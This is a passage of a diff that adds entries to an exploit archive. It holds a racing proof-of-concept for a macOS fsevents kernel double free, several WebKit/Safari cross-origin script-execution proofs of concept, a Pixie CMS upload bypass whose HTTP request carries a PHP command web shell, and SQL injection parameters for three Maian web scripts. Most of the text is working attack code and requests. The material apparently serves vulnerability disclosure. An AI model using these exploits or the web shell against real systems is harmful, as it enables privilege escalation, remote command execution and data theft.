dev_t *devices_not_to_watch, *tmp=NULL;
if (devfilt_args->num_devices > 256) {
ret = EINVAL;
break;
}
new_num_devices = devfilt_args->num_devices;
if (new_num_devices == 0) {
tmp = fseh->watcher->devices_not_to_watch; <------ (a)
lock_watch_table(); <------ (b)
fseh->watcher->devices_not_to_watch = NULL;
fseh->watcher->num_devices = new_num_devices;
unlock_watch_table(); <------ (c)
if (tmp) {
FREE(tmp, M_TEMP); <------ (d)
}
break;
}
There's nothing stopping two threads seeing the same value for devices_not_to_watch at (a),
assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this.
This leads to a double free, which if you also race allocations from the same zone can lead to an
exploitable kernel use after free.
/dev/fsevents is:
crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents
so this is a privesc from either root or members of the wheel group to kernel
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
(build with -O3)
The open handler for the fsevents device node has a further access check:
if (!kauth_cred_issuser(kauth_cred_get())) {
return EPERM;
}
restricting this issue to root only despite the permissions on the device node (which is world-readable)
*/
// ianbeer
#if 0
MacOS/iOS kernel double free due to bad locking in fsevents device
fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents
Heres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl:
case FSEVENTS_DEVICE_FILTER_64:
if (!proc_is64bit(vfs_context_proc(ctx))) {
ret = EINVAL;
break;
}
devfilt_args = (fsevent_dev_filter_args64 *)data;
handle_dev_filter:
{
int new_num_devices;
dev_t *devices_not_to_watch, *tmp=NULL;
if (devfilt_args->num_devices > 256) {
ret = EINVAL;
break;
}
new_num_devices = devfilt_args->num_devices;
if (new_num_devices == 0) {
tmp = fseh->watcher->devices_not_to_watch; <------ (a)
lock_watch_table(); <------ (b)
fseh->watcher->devices_not_to_watch = NULL;
fseh->watcher->num_devices = new_num_devices;
unlock_watch_table(); <------ (c)
if (tmp) {
FREE(tmp, M_TEMP); <------ (d)
}
break;
}
There's nothing stopping two threads seeing the same value for devices_not_to_watch at (a),
assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this.
This leads to a double free, which if you also race allocations from the same zone can lead to an
exploitable kernel use after free.
/dev/fsevents is:
crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents
so this is a privesc from either root or members of the wheel group to kernel
tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
(build with -O3)
#endif
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <pthread.h>
#include <unistd.h>
typedef uint64_t user64_addr_t;
typedef struct fsevent_clone_args64 {
user64_addr_t event_list;
int32_t num_events;
int32_t event_queue_depth;
user64_addr_t fd;
} fsevent_clone_args64;
#define FSEVENTS_CLONE_64 _IOW('s', 1, fsevent_clone_args64)
#pragma pack(push, 4)
typedef struct fsevent_dev_filter_args64 {
uint32_t num_devices;
user64_addr_t devices;
} fsevent_dev_filter_args64;
#pragma pack(pop)
#define FSEVENTS_DEVICE_FILTER_64 _IOW('s', 100, fsevent_dev_filter_args64)
void* racer(void* thread_arg){
int fd = *(int*)thread_arg;
printf("started thread\n");
fsevent_dev_filter_args64 arg = {0};
int32_t dev = 0;
while (1) {
arg.num_devices = 1;
arg.devices = (user64_addr_t)&dev;
int err = ioctl(fd, FSEVENTS_DEVICE_FILTER_64, &arg);
if (err == -1) {
perror("error in FSEVENTS_DEVICE_FILTER_64\n");
exit(EXIT_FAILURE);
}
arg.num_devices = 0;
arg.devices = (user64_addr_t)&dev;
err = ioctl(fd, FSEVENTS_DEVICE_FILTER_64, &arg);
if (err == -1) {
perror("error in FSEVENTS_DEVICE_FILTER_64\n");
exit(EXIT_FAILURE);
}
}
return NULL;
}
int main(){
int fd = open("/dev/fsevents", O_RDONLY);
if (fd == -1) {
perror("can't open fsevents device, are you root?");
exit(EXIT_FAILURE);
}
// have to FSEVENTS_CLONE this to get the real fd
fsevent_clone_args64 arg = {0};
int event_fd = 0;
int8_t event = 0;
arg.event_list = (user64_addr_t)&event;
arg.num_events = 1;
arg.event_queue_depth = 1;
arg.fd = (user64_addr_t)&event_fd;
int err = ioctl(fd, FSEVENTS_CLONE_64, &arg);
if (err == -1) {
perror("error in FSEVENTS_CLONE_64\n");
exit(EXIT_FAILURE);
}
if (event_fd != 0) {
printf("looks like we got a new fd %d\n", event_fd);
} else {
printf("no new fd\n");
}
pid_t pid = fork();
if (pid == 0) {
racer(&event_fd);
} else {
racer(&event_fd);
}
return 1;
}

48
platforms/multiple/webapps/41799.html Executable file
View file

@ -0,0 +1,48 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1056
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction();
m_doc = newDocument.copyRef();
...
}
The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame will be never detached from the cached document.
PoC:
-->
"use strict";
document.write("click anywhere to start");
window.onclick = () => {
let w = open("about:blank", "one");
let d = w.document;
let a = d.createElement("a");
a.href = "https://abc.xyz/";
a.click(); <<------- about:blank -> Document::InPageCache
let it = setInterval(() => {
try {
w.location.href.toString;
} catch (e) {
clearInterval(it);
let s = d.createElement("a"); <<------ about:blank's document
s.href = "javascript:alert(location)";
s.click();
}
}, 0);
};
<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->

70
platforms/multiple/webapps/41800.html Executable file
View file

@ -0,0 +1,70 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1068
Here is the definition of |JSCallbackData| class. This class is used to call a javascript function from a DOM object.
class JSCallbackDataStrong : public JSCallbackData {
public:
JSCallbackDataStrong(JSC::JSObject* callback, void*)
: m_callback(callback->globalObject()->vm(), callback)
{
}
JSC::JSObject* callback() { return m_callback.get(); }
JSDOMGlobalObject* globalObject() { return JSC::jsCast<JSDOMGlobalObject*>(m_callback->globalObject()); }
JSC::JSValue invokeCallback(JSC::MarkedArgumentBuffer& args, CallbackType callbackType, JSC::PropertyName functionName, NakedPtr<JSC::Exception>& returnedException)
{
return JSCallbackData::invokeCallback(callback(), args, callbackType, functionName, returnedException);
}
private:
JSC::Strong<JSC::JSObject> m_callback;
};
JSValue JSCallbackData::invokeCallback(JSObject* callback, MarkedArgumentBuffer& args, CallbackType method, PropertyName functionName, NakedPtr<JSC::Exception>& returnedException)
{
ASSERT(callback);
auto* globalObject = JSC::jsCast<JSDOMGlobalObject*>(callback->globalObject()); <<<---------- (1)
ASSERT(globalObject);
ExecState* exec = globalObject->globalExec();
JSValue function;
CallData callData;
CallType callType = CallType::None;
if (method != CallbackType::Object) {
function = callback;
callType = callback->methodTable()->getCallData(callback, callData);
}
if (callType == CallType::None) {
if (method == CallbackType::Function) {
returnedException = JSC::Exception::create(exec->vm(), createTypeError(exec)); <<<---------- (2)
return JSValue();
}
...
}
...
}
But |JSCallbackData::invokeCallback| method obtains the |ExecState| object from the callback object. So if we invoke |JSCallbackData::invokeCallback| method with the different origin's window as |callback|, an exception object will be created from the different domain's javascript context.
PoC:
-->
"use strict";
let f = document.body.appendChild(document.createElement("iframe"));
f.onload = () => {
f.onload = null;
try {
let iterator = document.createNodeIterator(document, NodeFilter.SHOW_ALL, f.contentWindow);
iterator.nextNode();
} catch (e) {
e.constructor.constructor("alert(location)")();
}
};
f.src = "https://abc.xyz/";

51
platforms/multiple/webapps/41801.html Executable file
View file

@ -0,0 +1,51 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1063
The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.
static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)
{
...
Document* document = frame.document(); <<-------- the new document.
if (is<HTMLDocument>(*document)) {
auto& htmlDocument = downcast<HTMLDocument>(*document);
auto* atomicPropertyName = propertyName.publicName();
if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {
JSValue namedItem;
if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {
Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);
ASSERT(collection->length() > 1);
namedItem = toJS(exec, thisObject->globalObject(), collection);
} else
namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));
slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);
return true;
}
}
return false;
}
PoC:
-->
"use strict";
let f = document.body.appendChild(document.createElement("iframe"));
let get_element = f.contentWindow.Function("return logo;");
f.onload = () => {
f.onload = null;
let node = get_element();
var sc = document.createElement("script");
sc.innerText = "alert(location)";
node.appendChild(sc);
};
f.src = "https://abc.xyz/";
<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->

86
platforms/multiple/webapps/41802.html Executable file
View file

@ -0,0 +1,86 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1074
When an element is removed from a document, the function |disconnectSubframes| is called to detach its subframes(iframe tag, object tag, etc.).
Here is a snippet of |disconnectSubframes|.
void disconnectSubframes(ContainerNode& root, SubframeDisconnectPolicy policy)
{
...
Vector<Ref<HTMLFrameOwnerElement>> frameOwners;
if (policy == RootAndDescendants) {
if (is<HTMLFrameOwnerElement>(root))
frameOwners.append(downcast<HTMLFrameOwnerElement>(root));
}
collectFrameOwners(frameOwners, root);
// Must disable frame loading in the subtree so an unload handler cannot
// insert more frames and create loaded frames in detached subtrees.
SubframeLoadingDisabler disabler(root);
bool isFirst = true;
for (auto& owner : frameOwners) {
// Don't need to traverse up the tree for the first owner since no
// script could have moved it.
if (isFirst || root.containsIncludingShadowDOM(&owner.get()))
owner.get().disconnectContentFrame();
isFirst = false;
}
}
The bug is that it doesn't consider |root|'s shadowroot. So any subframes in the shadowroot will be never detached.
It should be like:
...
collectFrameOwners(frameOwners, root);
if (is<Element>(root)) {
Element& element = downcast<Element>(root);
if (ShadowRoot* shadowRoot = element.shadowRoot())
collectFrameOwners(frameOwners, *shadowRoot);
}
...
PoC:
-->
var d = document.body.appendChild(document.createElement("div"));
var s = d.attachShadow({mode: "open"});
var f = s.appendChild(document.createElement("iframe"));
f.onload = () => {
f.onload = null;
f.src = "javascript:alert(location)";
var xml = `
<svg xmlns="http://www.w3.org/2000/svg">
<script>
document.documentElement.appendChild(parent.d);
</sc` + `ript>
<element a="1" a="2" />
</svg>`;
var v = document.body.appendChild(document.createElement("iframe"));
v.src = URL.createObjectURL(new Blob([xml], {type: "text/xml"}));
};
f.src = "https://abc.xyz/";
<!--
Tested on Safari 10.0.2(12602.3.12.0.1)
I didnt notice that the method shadowRoot is declared in Node.h. So the following would better make sense.
collectFrameOwners(frameOwners, root);
if (ShadowRoot* shadowRoot = root.shadowRoot())
collectFrameOwners(frameOwners, *shadowRoot);
-->

34
platforms/multiple/webapps/41803.html Executable file
View file

@ -0,0 +1,34 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1085
EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)
{
VM& vm = exec.vm();
auto scope = DECLARE_THROW_SCOPE(vm);
JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));
if (!stream)
return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");
JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1
CallData callData;
CallType callType = getCallData(jsFunction, callData);
MarkedArgumentBuffer noArguments;
return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));
}
It doesn't check whether |getReader| is callable or not.
PoC:
-->
let rs = new ReadableStream();
let cons = rs.getReader().constructor;
rs.getReader = 0x12345;
new cons(rs);
<!--
Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
-->

108
platforms/php/webapps/41784.txt Executable file
View file

@ -0,0 +1,108 @@
# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no
# Date: 02-April-2017
# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial
# Vendor Homepage: http://www.getpixie.co.uk
# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip
# Version: 1.0.4
# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402
I. Background:
Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker.
II. Description:
in Pixie CMS have three types for account privilege for upload:
- Administrator - Can access file manager but restricted extension for file upload.
- Client - Can access file manager but restricted extension for file upload.
- User - Cannot access file manager
Generally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this “Upload failed. Please check that the folder is writeable and has the correct permissions set”.
III. Exploit:
In this case, we used privilege as client and then access to “file manager” (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:
1. Prepare software to intercept (I used burpsuite free edtion).
2. Prepare for real image (our_shell.jpg).
3. Browse your real image on file manager pixie cms and click to upload button.
4. Intercept and change of filename “our_shell.jpg” to be “our_shell.jpg.php”
5. Under of perimeter “Content-Type: image/jpeg”, please change and write your shell. in this example, I use cmd shell.
6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this “our_shell.jpg.php was successfully uploaded”.
7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)
————
POST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager
Cookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949
Content-Length: 901
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="upload[]"; filename="our_shell.jpg.php"
Content-Type: image/jpeg
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="file_tags"
ourshell
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="submit_upload"
Upload
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="MAX_FILE_SIZE"
102400
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="bb2_screener_"
1490835014 192.168.1.6
-----------------------------8321182121675739546763935949--
 This is our screenshot from PoC: 
| |
| Upload for valid image
|
 
| |
| Change extension and insert your shell
|
 
| |
| Your shell success to upload on server
|
 
| |
| Example command for ipconfig
|
 
| |
| Example command for net user
|
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- @rungga_reksya, @dvnrcy, @dickysofficial
- Komunitas IT Auditor & IT Security Kaskus

26
platforms/php/webapps/41787.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Maian Uploader Script v4.0 - SQL Injection
# Google Dork: N/A
# Date: 04.04.2017
# Vendor Homepage: http://www.maiansoftware.com/
# Software: http://www.maianuploader.com/?dl=yes
# Demo: http://www.maiansoftware.com/demos/uploader/
# Version: 4.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?cmd=view&user=[SQL]
# mu_members:id
# mu_members:joindate
# mu_members:sign_date
# mu_members:joinstamp
# mu_members:username
# mu_members:email
# mu_members:accpass
# # # # #

18
platforms/php/webapps/41788.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Maian Survey v1.1 - SQL Injection
# Google Dork: N/A
# Date: 04.04.2017
# Vendor Homepage: http://www.maiansoftware.com/
# Software: http://www.maiansurvey.com/?dl=yes
# Demo: http://www.maiansoftware.com/demos/survey/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?cmd=surveys&survey=[SQL]
# # # # #

18
platforms/php/webapps/41789.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Maian Greetings v2.1 - SQL Injection
# Google Dork: N/A
# Date: 04.04.2017
# Vendor Homepage: http://www.maiansoftware.com/
# Software: http://www.maiangreetings.com/?dl=yes
# Demo: http://www.maiansoftware.com/demos/greetings/
# Version: 2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?cmd=search&keywords=a&cat=[SQL]
# # # # #